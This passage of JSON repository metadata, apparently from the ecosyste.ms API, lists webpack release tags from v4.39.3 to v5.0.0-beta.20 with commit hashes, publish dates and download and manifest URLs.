tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a7